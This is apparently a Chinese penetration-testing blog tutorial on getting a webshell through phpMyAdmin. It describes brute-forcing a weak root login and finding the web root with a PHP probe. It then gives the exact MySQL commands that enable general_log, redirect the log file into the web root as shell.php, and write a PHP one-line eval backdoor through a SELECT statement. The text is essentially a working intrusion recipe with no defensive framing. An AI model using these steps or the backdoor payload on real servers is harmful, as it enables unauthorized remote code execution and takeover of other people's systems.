phpMyAdmin利用日志文件GetSHELL
phpMyAdmin
是众多MySQL
图形化管理工具中使用最为广泛的一种,是一款使用PHP
开发的基于B/S
模式的MySQL
客户端软件,该工具是基于 Web
跨平台的管理程序,并且支持简体中文,用户可以在官网上下载最新版本的。
1、phpMyAdmin
利用日志文件GetSHELL
前提账号必须有可读可写
权限
2、MySQL
版本大于5.0
,MySQL 5.0
版本以上会创建日志文件,我们通过修改日志文件的全局变量,就可以GetSHELL
3、满足上方两个条件,还需要知道网站的绝对路径
,对于网站的绝对路径
查找有很多方法,在我博客里有讲解到:http://www.liuwx.cn/penetrationtest-6.html
这边是通过php探针
获取到了网站的绝对路径
:C:/phpStudy/WWW
接着是通过弱口令爆破来得到了phpMyAdmin
的登陆账号密码:root
进入到phpMyAdmin
管理页面后,得到一些关键信息:
服务器: localhost via TCP/IP
软件: MySQL
软件版本: 5.5.40 - MySQL Community Server (GPL)
协议版本: 10
用户: root@localhost
服务器字符集: UTF-8 Unicode (utf8)
Apache/2.4.10 (Win32) OpenSSL/0.9.8zb PHP/5.2.17
数据库客户端版本: libmysql - 5.0.51a
PHP 扩展: mysqli 文档
得知MySQL
的版本是大于5.0
,那么应该可以通过日志写入shell
show variables like '%general%';
日志读写默认是关闭的OFF
,然后我们打开日志读写功能:
打开general_log日志读写功能
SET GLOBAL general_log='on'
由于之前我们通过php探针得到了网站的绝对路径,然后我们就可以写入shell.php
到网站的根目录下:
SET GLOBAL general_log_file='C:/phpStudy/WWW/shell.php'
这个时候,对应的路径下就会生成一个shell.php
脚本文件:
PHP一句话木马:
<?php @eval($_POST[liuwx]);?>
写入一句话语句:
SELECT '<?php @eval($_POST[liuwx]);?>'
这个时候就成功写入一句话到了shell.php
里:
成功GetSHELL
: